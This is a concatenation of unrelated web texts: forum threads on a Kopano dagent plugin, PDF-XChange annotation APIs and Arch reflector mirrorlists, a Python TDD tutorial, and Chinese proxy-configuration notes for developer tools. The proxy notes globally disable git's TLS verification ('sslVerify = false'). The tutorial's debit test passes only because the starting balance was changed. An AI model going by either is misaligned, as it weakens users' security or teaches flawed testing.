@hpvb thanks for posting the plugin. If you add some documentation and add upload it somewhere (be for example in a gist at Github), then you could also add it to https://stash.z-hub.io/projects/COM/repos/projects-and-resources/browse#Kopano-dAgent-Spooler-Plugins
@fbartels sure, Iâll setup a repository for it and add some documentation. This may be useful for others besides just me and the other two people in this thread.
hpvblast edited by hpvb
@fbartels Does this look OK to you?
https://notabug.org/hp/kopano-dagent-rewritegaladdresses
If so Iâll add it to that wiki page.
@hpvb did not test your script, but the description reads fine for me. Thanks for making a repository for it.
Iâve sent a PR for that repository. Thanks for your feedback.
Pozzo-Balbilast edited by
@hpvb thanks a lot. Canât wait for your patch to reach nightly builds.
@Pozzo-Balbi I didnât end up writing a patch for dagent, but a
pluginfor dagent. You can get it here : https://notabug.org/hp/kopano-dagent-rewritegaladdresses. Once that is installed everything should start working. Iâve had it running for 5 days now without issue.
mnewmanlast edited by
Can someone please fix the Plugin. It´s not working with Python 3 in Kopano 8.7
Thanks
Markus
|
Overview
Test Driven Development (TDD) is a great approach for software development. TDD is nothing but the development of tests before adding a feature in code.
This approach is based on the principle that we should write small codes rather than writing long codes. In TDD, whenever we want to add more functionality in our codes, we first have to write a test for that. After that, we add new functionality with small code lines combined and then test it with our test. This approach helps us to reduce the risk of encountering significant problems at the production level. You may also love to read more about TDD and Unit Testing in this blog.
Test Driven Development (TDD)
Test Driven Development is an approach in which we build a test first, then fail the test and finally refactor our code to pass the test.
Test Driven Development (TDD) Approach
As the name suggests, we should first add the test before adding the functionality in our code. Now our target is to make the test pass by adding new code to our program. So we refactor our code to pass the written test. This uses the following process –
Write a failing unit test
Make the unit test pass
Repeat
Test Driven Development (TDD) Process Cycle
As shown in the flow
First, add tests for the functionality.
Next, we run our test to fail.
Next, we write code according to the error we received.
Then we run the tests again to see if the test fails or passes.
Then refactor the code and follow the process again.
Benefits of Test Driven Development (TDD)
Now the question arises why should one opt TDD approach. Practicing TDD brings lots of benefits. Some of the benefits are listed below –
In TDD we build test before adding any new feature to it, that means in TDD approach our entire code is covered under the test. That’s a great benefit of TDD as compared to the code which has no test coverage.
In TDD one should have a specific target before adding new functionality. This means before adding any new functionality one should be clear about its outcome.
In an application, one method depends on the other. When we write tests before the method that means we should have clear thoughts about the interfaces between the methods. That allows us to integrate our method with the entire application efficiently and help in making our application modular too.
As the entire code is covered by the test that means our final application will be less buggy. This is a big advantage of the TDD approach.
Acceptance Test Driven Development (ATDD)
ATDD is short for Acceptance Test Driven Development. In this process, a user, business manager and developer, all are involved.
First, they discuss what the user wants in his product; then business manager creates sprint stories for the developer. After that, the developer writes tests before starting the projects and then starts coding for their product.
Every product/software is divided into small modules, so the developer codes for the very first module then test it and sees it getting failed. If the test passes and the code are working as per user requirements, it is moved to the next user story; otherwise, some changes are made in coding or program to make the test pass.
This process is called Acceptance Test Driven Development.
Behavior Driven Development (BDD)
Behavior Driven testing is similar to Test Driven Development, in the way that in BDD also tests are written first and tested and then more code is added to it to make the test pass.
The major area where these two differ is that tests in BDD are written in plain descriptive English type grammar.
Tests in BDD aim at explaining the behaviour of the application and are also more user-focused. These tests use examples to clarify the user requirements in a better way.
Features of Behavior Driven Development (BDD)
The major change is in the thought process which is to be shifted from analyzing in tests to analyzing in behaviour.
Ubiquitous language is used; hence it is easy to be explained.
BDD approach is driven by business value.
It can be seen as an extension to TDD; it uses natural language which is easy to understand by non-technical stakeholders also.
You May also Love to Read
Test Driven Development in Scala
Behavior Driven Development (BDD) Approach
We believe that the role of testing and test automation TDD(Test Driven Development) is essential to the success of any BDD initiative. Testers have to write tests that validate the behaviour of the product or system being generated.
The test results formed are more readable by the non-technical user as well. For Behavior Driven Development to be successful, it becomes crucial to classify and verify only those behaviours that give directly to business outcomes.
Developer in the BDD environment has to identify what program to test and what not to test and to understand why the test failed. Much like Test Driven Development, BDD also recommends that tests should be written first and should describe the functionalities of the product that can be suited to the requirements.
Behavior Driven Development helps greatly when building detailed automated unit tests because it focuses on testing behaviour instead of testing implementation. The developer thus has to focus on writing test cases keeping the synopsis rather than code implementation in mind.
By doing this, even when the requirements change, the developer does not have to change the test, input and output to support it. That makes unit testing automation much faster and more reliable.
Though BDD has its own sets of advantages, it can sometimes fall prey to reductions. Development teams and Tester, therefore, need to accept that while failing a test is a guarantee that the product is not ready to be delivered to the client, passing a test also does not mean that the product is ready for launch.
It will be closed when development, testing and business teams will give updates and progress report on time. Since the testing efforts are moved more towards automation and cover all business features and use cases, this framework ensures a high defect detection rate due to higher test coverage, faster changes, and timely releases.
Benefits of Behavior Driven Development (BDD)
It is highly suggested for teams and developers to adopt BDD because of several reasons, some of them are listed below –
BDD provides a very accurate guidance on how to be organizing communication between all the stakeholders of a project, may it be technical or non-technical.
BDD enables early testing in the development process, early testing means lesser bugs later.
By using a language that is understood by all, rather than a programming language, a better visibility of the project is achieved.
The developers feel more confident about their code and that it won’t break which ensures better predictability.
Test Driven Development (TDD) with Python
Here we exploring the Test-driven development approach with Python. Python official interpreter comes with the unit test module
Python Unit Testing
These are the main methods which we use with python unit testing
a == b
a != b
bool(x) is True
bool(x) is False
a is b
a is not b
x is None
x is not None
a in b
a not in b
isinstance(a, b)
not isinstance(a, b)
You May also Love to Read
Test Driven & Behavior Driven Development in Java
Test Driven Development (TDD) in Python with Examples
We are going to work on an example problem of banking. Let’s say that our banking system introduced a new facility of credit money. So we have to add this to our program.
Following the TDD approach before adding this credit feature, we first write our test for this functionality.
Setting Up Environment For Test Driven Development (TDD)
This is our directory structure
Writing Test For Test Driven Development (TDD)
So we write the following code for the unittest in the test/tdd_example.py
import unittest
class Tdd_Python(unittest.TestCase):
def test_banking_credit_method_returns_correct_result(self):
bank = Banking()
final_bal = bank.credit(1000)
self.assertEqual(1000, final_bal)
Here first we import the unittest module and then write our test method. One thing which we should notice that every test method should start with the test word.
Now we run this program
File "/PycharmProjects/TDD_Python/test/tdd_example.py", line 6, in test_banking_credit_method_returns_correct_result
bank = Banking()
NameError: name 'Banking'
is not defined
We get an error here that is Banking not defined because we have not created it.
Implementing Test Driven Development (TDD) in Python
So first we have to create our Banking class in the app/banking_app.py file
class Banking():
def __init__(self):
self.balance = 0
def credit(self, amount):
pass
And now our test/tdd_example.py look like this
import unittest
from app.banking_app
import Banking
class Tdd_Python(unittest.TestCase):
def test_banking_credit_method_returns_correct_result(self):
bank = Banking()
final_bal = bank.credit(1000)
self.assertEqual(1000, final_bal)
if __name__ == '__main__':
unittest.main()
Now let’s run the test again
AssertionError: 1000 != None
Ran 1 test in 0.002 s
FAILED(failures = 1)
No, the test fails because we don’t get any return from the credit method in Banking class. So we have to manipulate it
class Banking():
def __init__(self):
self.balance = 0
def credit(self, amount):
self.balance += amount
return self.balance
Now run the test again
Testing started at 5: 10 PM...Ran 1 test in 0.001 sOK
That is the success. So we add credit functionality in our banking and it works as expected
But our program is not able to handle some situations, like when a user entered a string instead of the number then our program might crash. So we have to deal with this situation.
First, we have to write our test for this
import unittest
from app.banking_app
import Banking
class Tdd_Python(unittest.TestCase):
def setUp(self):
self.bank = Banking()
def test_banking_credit_method_returns_correct_result(self):
final_bal = self.bank.credit(1000)
self.assertEqual(1000, final_bal)
def test_banking_credit_method_returns_error_if_args_not_numbers(self):
self.assertRaises(ValueError, self.bank.credit, 'two')
if __name__ == '__main__':
unittest.main()
The output is this
Ran 2 tests in 0.002 s
FAILED(errors = 1)
The code is failing because we have not added that functionality in our app
After adding in our code the code will look like this
class Banking():
def __init__(self):
self.balance = 0
def credit(self, amount):
amount_type = (int, float, complex)
if isinstance(amount, amount_type):
self.balance += amount
return self.balance
else :
raise ValueError
After running the test we get
Testing started at 5: 33 PM...
Launching unittests with arguments python - m unittesttdd_example.py in /PycharmProjects/TDD_Python / test
Ran 2 tests in 0.002 s
OK
Similarly, we can add more functionality to our app by following this approach. By following the same process
In the bank, there is more operation like debit money. That means we have to add another functionality of debit also.
So we start with the same approach first building test for the debit operation
import unittest
from app.banking_app
import Banking
class Tdd_Python(unittest.TestCase):
def setUp(self):
self.bank = Banking()
def test_banking_credit_method_returns_correct_result(self):
final_bal = self.bank.credit(1000)
self.assertEqual(1000, final_bal)
def test_banking_credit_method_returns_error_if_args_not_numbers(self):
self.assertRaises(ValueError, self.bank.credit, 'two')
def test_banking_debit_method_returns_correct_result(self):
final_bal = self.bank.debit(700)
self.assertEqual(1000, final_bal)
def test_banking_debit_method_returns_error_if_args_not_numbers(self):
self.assertRaises(ValueError, self.bank.debit, 'two')
if __name__ == '__main__':
unittest.main()
As expected we get the error
AttributeError: 'Banking'
object has no attribute 'debit'
Ran 4 tests in 0.003 s
FAILED(errors = 2)
So we refactor our code again by adding debit money method
class Banking():
def __init__(self):
self.balance = 1000
def credit(self, amount):
amount_type = (int, float, complex)
if isinstance(amount, amount_type):
self.balance += amount
return self.balance
else :
raise ValueError
def debit(self, amount):
amount_type = (int, float, complex)
if isinstance(amount, amount_type):
self.balance -= amount
return self.balance
else :
raise ValueError
And now running the test again
Testing started at 5: 44 PM...Launching unittests with arguments python - m unittest / PycharmProjects / TDD_Python / test / tdd_example.py / PycharmProjects / TDD_Python / testRan 4 tests in 0.002 sOK
Test Driven Development (TDD) Tools For Python
nosetest
nosetest is a test runner package. We can easily install this by just pip command
$ pip install nose
Once it is installed successfully we can run test file simply by just
$ nosetests example_unit_test.py
And the result is as follow
(venv) xenon@dm08:~/PycharmProjects/TDD_Python$ nosetests test/tdd_example.py
----------------------------------------------------------------------
Ran 4 tests in 0.001s
OK
Or execute tests of folder
$ nosetests /path/to/tests
py.test
py.test is also similar to the nosetest, one thing that makes it good is that it show the output of each test in separate bottom area
We can install this by the following command
$ pip install pytest
Once it is installed successfully we can run test file simply by just
$ py.test test/example_unit_test.py
(venv) xenon @dm08: ~/PycharmProjects/TDD_Python$ py.test test / tdd_example.py === === === === === === === === == test session starts === === === === === === === === === == platform linux--Python 3.4 .3, pytest - 3.2 .5, py - 1.5 .2, pluggy - 0.4 .0 rootdir: /home/xenon / PycharmProjects / TDD_Python, inifile: collected 4 items test / tdd_example.py.... === === === === === === === === 4 passed in 0.09 seconds === === === === === === === === ===
unittest
unittest is default test package of the python. It is useful we don’t want to install external packages. To use this just add following lines in the code
if __name__ == '__main__':
unittest.main()
unittest.mock
In python, there is a library unitest.mock for testing. This is useful when we try to test a function which requires large time to complete. So we use unittest.mock library to mock that function. This library mock objects and make assertions about their uses. unitest.mock provide a Mock class, MagicMock and patch(). Here is a quick example to use them
Suppose our credit function uses too much time to complete. So instead to call the function credit in the test we should mock it to speed up the testing
import unittest
from unittest.mock
import patch
from app.banking_app
import Banking
class TestBanking(unittest.TestCase):
@patch('app.banking_app.Banking.credit', return_value = 1700)
def test_credit(self, credit):
self.assertEqual(credit(700), 1700)
After running this test we get the following output
(venv) xenon @dm08: ~/PycharmProjects/TDD_Python$
py.test test / mock.py === === === === === === === === = test session starts === === === === === === === === === === =
platform linux--Python 3.4 .3, pytest - 3.2 .5, py - 1.5 .2, pluggy - 0.4 .0
rootdir: /home/xenon / PycharmProjects / TDD_Python, inifile:
collected 1 item
test / mock.py.
=== === === === === === === === == 1 passed in 0.14 seconds === === === === === === === === ===
You May also Love to Read
Test Driven & Behavior Driven Development in JavaScript and React.JS
Summary
In TDD approach the main objective is to fail first and then rectify your code. So we first build test, fail the test and then refactor our code to pass the test. This approach uses the idea that first we should finalize what we require, then built the target test for it, and then start to achieve that target.
How Can XenonStack Help You?
XenonStack follows the Test Driven Development Approach in the development of Enterprise level Applications following Agile Scrum Methodology.
Data Analysis Services
XenonStack Data Analysis services offers data preparation, statisticial analysis, creating meaningful Data Visualizations, predicting future trends and more. Python offers rich set of utilities and libraries for Data Processing and Data Analytics task. Different Data Analysis Libraries used for data analysis includes Pandas, NumPy, SciPy, IPython and more.
Data Visualization with Python
XenonStack Data Visualization Services provides you with interactive products to visually communicate your data. Bring your data to life with our Real-Time Data Visualization dashboards. Data Visualization with Python uses widely used Visualization Packages like Matplotlib, Seaborn, ggplot, Altair, Bokeh, pygal, Plotly, geoplotlib and more.
Machine Learning As-A-Service
Unlock the value of your data to take smarter decisions. XenonStack Machine Learning Consulting Services helps in achieving Business Insights. Access the computational and storage infrastructure and tools required to accelerate work in Deep Learning. Stay a step ahead of disruption and exceed customer expectation by implementing Predictive Analytics Solutions.
|
Hello!
I used to draw a rectangle of a certain color and thickness in PDF Viewer using annotations (with the JavaScript function addAnnot()).
Could I simply draw a rectangle with any function of the PDF-Tools Library or should I also create an Annotation with the PXCp_Add3DAnnotationW() function? The problem is I'm trying to use only the PDF-Tools in order to manipulate a PDF-Document.
Thanks for any answers!
I used to draw a rectangle of a certain color and thickness in PDF Viewer using annotations (with the JavaScript function addAnnot()).
Could I simply draw a rectangle with any function of the PDF-Tools Library or should I also create an Annotation with the PXCp_Add3DAnnotationW() function? The problem is I'm trying to use only the PDF-Tools in order to manipulate a PDF-Document.
Thanks for any answers!
Hi!
I have some questions on the PXCp_AddLineAnnotationW function:
1. The last parameter of the function is a pointer to a PXC_CommonAnnotInfo structure. It expects among other things an integer value for a color. Here is an extract from the docs with a pseudo code: I couldn't find any equivalent of that function in WPF. How is that value calculated?
This is an extract from my code:I didn't define the values for AnnotInfo.m_Border.m_DashArray. No annotation is created. I tested it with JavaScript command this.getAnnots(0); It returns null.
Thanks!
I have some questions on the PXCp_AddLineAnnotationW function:
1. The last parameter of the function is a pointer to a PXC_CommonAnnotInfo structure. It expects among other things an integer value for a color. Here is an extract from the docs with a pseudo code:
Code: Select all
AnnotInfo.m_Color = RGB(200, 0, 100);
2. A comprehension question: should I draw four single lines in order to create a rectangle or can I directly draw a rectangle with that function (with the parameter LPCPXC_RectF rect that specifies the bounding rectangle of the annotation)?RGB(255, 255, 255) = 16777215 ???
This is an extract from my code:
Code: Select all
var borderRect = new PdfXchangePro.PXC_RectF { left = selection.Left,
right = selection.Right,
top = selection.Top,
bottom = selection.Bottom };
int color = 16777215; // RGB(255, 255, 255) ???
var border = new PdfXchangePro.PXC_AnnotBorder { m_Width = StrToDouble(BorderThickness),
m_Type = PdfXchangePro.PXC_AnnotBorderStyle.ABS_Solid };
var borderInfo = new PdfXchangePro.PXC_CommonAnnotInfo{ m_Color = color,
m_Flags = Convert.ToInt32(PdfXchangePro.PXC_AnnotsFlags.AF_ReadOnly),
m_Opacity = _opacity,
m_Border = border };
var startPoint = new PdfXchangePro.PXC_PointF {x = selection.Left, y = selection.Top};
var endPoint = new PdfXchangePro.PXC_PointF {x = selection.Right, y = selection.Bottom};
int retval = PdfXchangePro.PXCp_AddLineAnnotationW(_handle,
0,
ref borderRect,
"xy",
"yx",
ref startPoint,
ref endPoint,
PdfXchangePro.PXC_LineAnnotsType.LAType_None,
PdfXchangePro.PXC_LineAnnotsType.LAType_None,
color,
ref borderInfo); // function returns 0
Thanks!
Site Admin
Posts:3632
Joined:Thu Jul 08, 2004 10:36 pm
Location:Vancouver Island - Canada
Contact:
Can you send me PDF generated by your code ?
P.S. RGB is 'macro' is equivalent to the following function
P.S. RGB is 'macro' is equivalent to the following function
Code: Select all
// r, g, and b in range from 0 to 255
ULONG _RGB(int r, int g, int b)
{
return (ULONG)(r + g * 256 + b * 65536);
}
Tracker Software (Project Director)
When attaching files to any message - please ensure they are archived and posted as a .ZIP, .RAR or .7z format - or they will not be posted - thanks.
When attaching files to any message - please ensure they are archived and posted as a .ZIP, .RAR or .7z format - or they will not be posted - thanks.
I've got it! I had to close the document in the PDF viewer before creating a line annotation with PDF Tools Library function PXCp_AddLineAnnotationW!
I still don't understand whether I can create a rectangle as one annotation or I have to construct it generating 4 single lines? The third parameter (LPCPXC_RectF rect) in this function is according to the documentation a bounding rectangle of the
annotation. What is the use of it?
One more question. Is it possible to suppress the pop-up annotation dialog that appears after a double-click on the annotation? Are there any parameter in the PXCp_AddLineAnnotationW function to manage it. I've only found the flag PXC_AnnotsFlags.AF_ReadOnly of the PXC_CommonAnnotInfo class, that makes the line annotation (or the annotation bounding rectangle?) read-only.
I still don't understand whether I can create a rectangle as one annotation or I have to construct it generating 4 single lines? The third parameter (LPCPXC_RectF rect) in this function is according to the documentation a bounding rectangle of the
annotation. What is the use of it?
One more question. Is it possible to suppress the pop-up annotation dialog that appears after a double-click on the annotation? Are there any parameter in the PXCp_AddLineAnnotationW function to manage it. I've only found the flag PXC_AnnotsFlags.AF_ReadOnly of the PXC_CommonAnnotInfo class, that makes the line annotation (or the annotation bounding rectangle?) read-only.
Tracker Supp-Stefan
Site Admin
Posts:14208
Joined:Mon Jan 12, 2009 8:07 am
Location:London
Contact:
Hi Relapse,
It is definitely possible with the low level functions, but unfortunately the only High Level ones are for adding annotations - not for deleting them.
Best,
Stefan
It is definitely possible with the low level functions, but unfortunately the only High Level ones are for adding annotations - not for deleting them.
Best,
Stefan
Tracker Supp-Stefan
Site Admin
Posts:14208
Joined:Mon Jan 12, 2009 8:07 am
Location:London
Contact:
Hello relapse,
As mentioned before - there are no high level functions that will allow you to delete annotations.
So you will need to read on annotations in the PDF Reference:
http://wwwimages.adobe.com/www.adobe.co ... ce_1-7.pdf
section 8.4 Annotations in the above document
or section 12.4 Annotations in the ISO version of the file:
http://wwwimages.adobe.com/www.adobe.co ... 0_2008.pdf
And then utilize the low level functions described in
Alternatively - you could use JS while you have the files opened in the Viewer AX. This should be quite a lot easier to implement, and will still allow you to create/edit/delete annotations as needed.
Best,
Stefan
Tracker
As mentioned before - there are no high level functions that will allow you to delete annotations.
So you will need to read on annotations in the PDF Reference:
http://wwwimages.adobe.com/www.adobe.co ... ce_1-7.pdf
section 8.4 Annotations in the above document
or section 12.4 Annotations in the ISO version of the file:
http://wwwimages.adobe.com/www.adobe.co ... 0_2008.pdf
And then utilize the low level functions described in
3.2.5 PDF Dictionary Functionsof our PDF Tools SDK manual to read and manipulate the annotations dictionary as neeed.
Alternatively - you could use JS while you have the files opened in the Viewer AX. This should be quite a lot easier to implement, and will still allow you to create/edit/delete annotations as needed.
Best,
Stefan
Tracker
Tracker Supp-Stefan
Site Admin
Posts:14208
Joined:Mon Jan 12, 2009 8:07 am
Location:London
Contact:
Hi Relapse,
There are some snippets inside the manual, but there isn't anything more complex - as those are low level functions giving you access to the very structure of the PDF File and the way you would like to use such methods will greatly vary from case to case. You will need to get yourself acquainted with the PDF specification to be able to use those successfully.
Best,
Stefan
There are some snippets inside the manual, but there isn't anything more complex - as those are low level functions giving you access to the very structure of the PDF File and the way you would like to use such methods will greatly vary from case to case. You will need to get yourself acquainted with the PDF specification to be able to use those successfully.
Best,
Stefan
I do read the pdf specification
I cannot understand how it is possible to access the Annotations-dictionary of a ceratin page.
I've found the function PXCp_ObjectGetDictionary, but it needs an object handle. Where can I get it?
I cannot understand how it is possible to access the Annotations-dictionary of a ceratin page.
I've found the function PXCp_ObjectGetDictionary, but it needs an object handle. Where can I get it?
Tracker Supp-Stefan
Site Admin
Posts:14208
Joined:Mon Jan 12, 2009 8:07 am
Location:London
Contact:
Hi relapse,
You might want to use functions like PXCp_llGetObjectByIndex to obtain an object first, and then here is the sample from the manual for using the PXCp_ObjectGetDictionary function:Best,
Stefan
You might want to use functions like PXCp_llGetObjectByIndex to obtain an object first, and then here is the sample from the manual for using the PXCp_ObjectGetDictionary function:
Code: Select all
// Retrieve object's dictionary
HPDFOBJECT hObject;
...
HPDFDICTIONARY hDict;
hr = PXCp_ObjectGetDictionary(hObject, &hDict);
if (IS_DS_FAILED(hr))
{
// report error
...
}
Stefan
I try to use the PXC_Rect function in order to draw a real rectangle and not an annotation.
What is this identifier for the page content and how can I get it?
Thanks!
HRESULT PXC_Rect(
_PXCContent* content,
double left,
double top,
double right,
double bottom
);
Parameters
content [in] Parameter content specifies the identifier for the page content to which the function will be applied.
_PXCContent* content,
double left,
double top,
double right,
double bottom
);
Parameters
content [in] Parameter content specifies the identifier for the page content to which the function will be applied.
What is this identifier for the page content and how can I get it?
Thanks!
Tracker Supp-Stefan
Site Admin
Posts:14208
Joined:Mon Jan 12, 2009 8:07 am
Location:London
Contact:
Hi Relapse,
This method is from the PXCLIB40 set of functions - those are aimed at creating new PDF document from scratch - so you can not use that to just add a rectangle to an already existing page I am afraid.
Otherwise - you can see how the content identifier is to be set up in the sample projects in
C:\Program Files\Tracker Software\PDF-XChange PRO 4 SDK\Examples\SDKExamples\<<YOUR Programming language>>\PDFXCDemo
Best,
Stefan
This method is from the PXCLIB40 set of functions - those are aimed at creating new PDF document from scratch - so you can not use that to just add a rectangle to an already existing page I am afraid.
Otherwise - you can see how the content identifier is to be set up in the sample projects in
C:\Program Files\Tracker Software\PDF-XChange PRO 4 SDK\Examples\SDKExamples\<<YOUR Programming language>>\PDFXCDemo
Best,
Stefan
Thanks, Stefan, your patience is honorable.
Is there any difference between
HRESULT PXCp_Init(PDFDocument* pObject, LPCSTR Key, LPCSTR DevCode);
and
HRESULT PXC_NewDocument(_PXCDocument** pdf, LPCSTR key, LPCSTR devCode);
? Are the both parameters
I've tried to mix the use of the both libraries:but I've got an AccessViolationException executing the PXC_GetPage function.
I've also found no function to delete a new created (with PXC_Rect) graphical object or is it not possible at all?
Is there any difference between
HRESULT PXCp_Init(PDFDocument* pObject, LPCSTR Key, LPCSTR DevCode);
and
HRESULT PXC_NewDocument(_PXCDocument** pdf, LPCSTR key, LPCSTR devCode);
? Are the both parameters
andPDFDocument* pObjectidentical?_PXCDocument** pdf
I've tried to mix the use of the both libraries:
Code: Select all
int pageContentIdentifier;
int pdfHandle;
int pdfPage = 0;
PdfXchangePro.PXCp_Init(out pdfHandle, PdfXchangePro.SerialNumber, PdfXchangePro.DevelopmentCode);
PdfXchangePro.PXCp_ReadDocumentW(pdfHandle, _tempFile, 0);
PdfXchange.PXC_GetPage(pdfHandle, pdfPage, out pageContentIdentifier);
PdfXchange.PXC_Rect(pdfHandle, 20, 100, 100, 20);
I've also found no function to delete a new created (with PXC_Rect) graphical object or is it not possible at all?
Tracker Supp-Stefan
Site Admin
Posts:14208
Joined:Mon Jan 12, 2009 8:07 am
Location:London
Contact:
Hi Relapse,
I am afraid you can't mix methods from the two libraries. You will need to create and save a PDF file using the PXC_ methods, and then open it and modify it using the PCXp_ones.
As PCX_ methods are designed for building up PDF files - there are no delete methods - as you are creating a pdf file or page starting from an empty one and only adding the components you want.
Best,
Stefan
I am afraid you can't mix methods from the two libraries. You will need to create and save a PDF file using the PXC_ methods, and then open it and modify it using the PCXp_ones.
As PCX_ methods are designed for building up PDF files - there are no delete methods - as you are creating a pdf file or page starting from an empty one and only adding the components you want.
Best,
Stefan
Yesterday I managed to draw a rectangle I needed but the restriction is - it must be a new pdf document. It's a pity!
Now I'm trying to delete line annotations directly in dictionaries. By the way I can create a line annotation of any thickness with the function PXCp_AddLineAnnotationW, there is no such a limit of 20 points as in JS. But I miss very much any examples for handling the dictionaries. I've found an example in the forum http://www.tracker-software.com/forum3/ ... nnotationW but it's in C++ and I'm fighting with translation of the of the low-level functions' declarations into C#.
Now I'm trying to delete line annotations directly in dictionaries. By the way I can create a line annotation of any thickness with the function PXCp_AddLineAnnotationW, there is no such a limit of 20 points as in JS. But I miss very much any examples for handling the dictionaries. I've found an example in the forum http://www.tracker-software.com/forum3/ ... nnotationW but it's in C++ and I'm fighting with translation of the of the low-level functions' declarations into C#.
Tracker Supp-Stefan
Site Admin
Posts:14208
Joined:Mon Jan 12, 2009 8:07 am
Location:London
Contact:
Hello Relapse,
Glad to hear that you got it working. And great to hear there are no width limitations with the PXCp_AddLineAnnotationW method.
As for samples for handling dictionaries - I am afraid that I can't help - any any samples would probably be in the PDF Specification itself.
Best,
Stefan
Glad to hear that you got it working. And great to hear there are no width limitations with the PXCp_AddLineAnnotationW method.
As for samples for handling dictionaries - I am afraid that I can't help - any any samples would probably be in the PDF Specification itself.
Best,
Stefan
The best advice here is to look at the C# wrappers for other projects. It is important to use the proper marshalling for types like BSTR and LPWSTR (from C# "string" types). If you look at function declarations for DLL imports in C# you'll often see a function argument prefixed by something like:relapse wrote:Yesterday I managed to draw a rectangle I needed but the restriction is - it must be a new pdf document. It's a pity!
Now I'm trying to delete line annotations directly in dictionaries. By the way I can create a line annotation of any thickness with the function PXCp_AddLineAnnotationW, there is no such a limit of 20 points as in JS. But I miss very much any examples for handling the dictionaries. I've found an example in the forum http://www.tracker-software.com/forum3/ ... nnotationW but it's in C++ and I'm fighting with translation of the of the low-level functions' declarations into C#.
Code: Select all
[MarshalAs(UnmanagedType.LPWStr)]
Code: Select all
sometype somefunction([MarshalAs(UnmanagedType.LPWStr)] string InputLPWSTR);
UnmanagedType has a lot of members (LPWStr, BStr, etc) that you can specify for different scenarios. Check MSDN for details or use autocomplete in Visual Studio to see a list.
Also note the use of "ref" and "out" keywords that are used when the API function takes a pointer. "ref" means C# will check to see if the value is initialized; "out" means it may be uninitialized and is expected to be set by the function.
Code: Select all
E.g. C++:
HRESULT calculate_property_of_mystruct(mystruct* input, int* output);
would be imported into C# with:
... calculate_property_of_mystruct(ref mystruct input, out int output);
Lots of reading here:
http://msdn.microsoft.com/en-us/library/26thfadc.aspx
http://msdn.microsoft.com/en-us/library/fzhhdwae.aspx
|
1 git
github的repo拖不下来可以参考:
[http]
proxy = "socks5://127.0.0.1:1091"
sslVerify = false
postBuffer = 524288000
lowSpeedLimit = 0
lowSpeedTime = 999999
[https]
proxy = "socks5://127.0.0.1:1091"
sslVerify = false
postBuffer = 524288000
lowSpeedLimit = 0
lowSpeedTime = 999999
[core]
symlinks = true
gitProxy = 'socks5://127.0.0.1:1091'
修改到~/.gitconfig文件中作为全局配置。
2 Python
Python的urllib可以自动使用环境变量指定的proxy,设置如下:
import os
os.environ['HTTP_PROXY'] = '127.0.0.1:1093'
os.environ['HTTPS_PROXY'] = '127.0.0.1:1093'
注意需要增加到urllib的import之前。
另外,对于pip安装工具的代理设置,如果使用socks5,需要安装pysock
pip install pysocks
然后在使用pip时添加参数:
pip install --proxy='socks5://127.0.0.1:1091' numpy
3 Cargo
Cargo是Rust的包管理工具,需要修改cargo的配置文件:
[http] proxy = "socks5://127.0.0.1:1091"[https] proxy = "socks5://127.0.0.1:1091"
改全局的话改~/.cargo/config文件。改当前项目可以改$ProjRoot/.cargo/config文件,不存在可以新创建。
4 Flutter
Flutter可以修改$FlutterRoot/bin/flutter.bat|flutter,增加到第一行:
REM for windows
set https_proxy=socks5://127.0.0.1:1091
# for *nix
export https_proxy="socks5://127.0.0.1:1091"
由于flutter用的是dart的基础设施,所以也可以改$FlutterRoot/bin/cache/dart-sdk/pub.bat|pub,也是增加到第一行:
REM for windows
set https_proxy=socks5://127.0.0.1:1091
# for *nix
export https_proxy="socks5://127.0.0.1:1091"
5 Android Studio Gradle
找到$PROJ/gradle.properties文件,
增加如下配置:
systemProp.https.proxyHost=127.0.0.1
systemProp.https.proxyPort=1093
6 hg
[http_proxy]
host=127.0.0.1:1093
user=username
passwd=password
~/.hgrc for *nix, ~/mercurial.ini for windows
7 npm
npm config set proxy http://127.0.0.1:1093
npm config set https-proxy http://127.0.0.1:1093
8 其他
使用系统httpclient的和flutter相同。
|
Stupid question: how are people using reflector?
I just run it manually every so often (I'm sure there are better ways) followed by the pacman command you mentioned:
[notme@nothere bin]$ cat update-mirrors.sh
mv /etc/pacman.d/mirrorlist /etc/pacman.d/mirrorlist.backup
reflector -l 15 --sort rate --save /etc/pacman.d/mirrorlist
diff /etc/pacman.d/mirrorlist /etc/pacman.d/mirrorlist.backup
Last edited by chr0nik (2011-11-13 02:25:48)
Offline
Stupid question: how are people using reflector?
I don't use it directly. I have a fixed mirrorlist for syncing the database. When I upgrade the system with powerpill-light, it uses Reflector at run-time to get a list of the most up-to-date mirrors for parallel downloads.
Offline
Nice script, thanks Xyne.
What about putting the command used to generate the file in the generated file?
Done.
# Arch Linux mirrorlist generated by Reflector
# With: /usr/bin/reflector -l 5
# When: 2012-03-10 19:46:34 UTC
# From: https://www.archlinux.org/mirrors/status/json/
# Retrieved: 2012-03-10 19:46:34 UTC
# Last Check: 2012-03-10 18:54:32 UTC
Server = ftp://ftp.las.ic.unicamp.br/pub/archlinux/$repo/os/$arch
Server = http://www.las.ic.unicamp.br/pub/archlinux/$repo/os/$arch
Server = ftp://ftp.tku.edu.tw/Linux/ArchLinux/$repo/os/$arch
Server = ftp://mirrors.uk2.net/pub/archlinux/$repo/os/$arch
Server = http://ftp.tku.edu.tw/Linux/ArchLinux/$repo/os/$arch
Offline
I'm in the same boat as ddffnn, and would like a --sort=score option. Could this be considered for inclusion in reflector? I have a patch for it here.
Offline
Offline
Awesome, thanks!
Offline
The "score" sort option is sorting by highest score, but lower is better.
# Arch Linux mirrorlist generated by Reflector
# With: /usr/bin/reflector -c 'United States' --sort score
# When: 2012-03-24 21:13:32 UTC
# From: https://www.archlinux.org/mirrors/status/json/
# Retrieved: 2012-03-24 21:13:32 UTC
# Last Check: 2012-03-24 20:40:29 UTC
Server = ftp://lug.mtu.edu/archlinux/ftpfull/$repo/os/$arch
Server = http://lug.mtu.edu/archlinux/ftpfull/$repo/os/$arch
Server = http://archlinux.tserver.net/$repo/os/$arch
Server = http://archlinux.supsec.org/$repo/os/$arch
Server = ftp://ftp.osuosl.org/pub/archlinux/$repo/os/$arch
Server = http://mirrors.gigenet.com/archlinux/$repo/os/$arch
Server = http://ftp.osuosl.org/pub/archlinux/$repo/os/$arch
Server = ftp://mirror.us.leaseweb.net/archlinux/$repo/os/$arch
Server = ftp://mirror.ancl.hawaii.edu/linux/archlinux/$repo/os/$arch
Server = http://mirror.us.leaseweb.net/archlinux/$repo/os/$arch
Server = http://mirror.yellowfiber.net/archlinux/$repo/os/$arch
Server = http://mirrors.lax1.thegcloud.com/arch//$repo/os/$arch
Server = http://mirror.ancl.hawaii.edu/linux/archlinux/$repo/os/$arch
